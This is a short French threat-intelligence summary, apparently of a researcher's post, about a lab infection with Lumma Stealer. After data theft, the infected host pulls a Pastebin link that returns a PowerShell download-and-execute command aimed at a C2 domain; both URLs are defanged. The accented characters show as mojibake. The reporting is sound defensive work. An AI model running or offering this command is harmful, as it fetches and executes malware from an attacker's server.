Lumma Stealer multiplie les tùches planifiées et accroßt le trafic C2 vers fileless-market[.]cc
Source: billet signĂ© par Brad Duncan (publiĂ© le 14 janvier 2026). Contexte: lâauteur documente en laboratoire un exemple dâinfection Lumma Stealer prĂ©sentant un comportement post-infection inhabituel qui gĂ©nĂšre une hausse continue de trafic vers un mĂȘme domaine C2. AprĂšs lâexfiltration des donnĂ©es par Lumma Stealer, lâhĂŽte Windows infectĂ© rĂ©cupĂšre des instructions depuis un lien Pastebin (hxxps[:]//pastebin[.]com/raw/xRmmdinT) utilisĂ©es pour une infection de suivi. Le contenu Pastebin renvoie une commande PowerShell: irm hxxps[:]//fileless-market[.]cc/Notes.pdf | iex, entraĂźnant des requĂȘtes HTTPS rĂ©pĂ©tĂ©es vers hxxps[:]//fileless-market[.]cc/. ...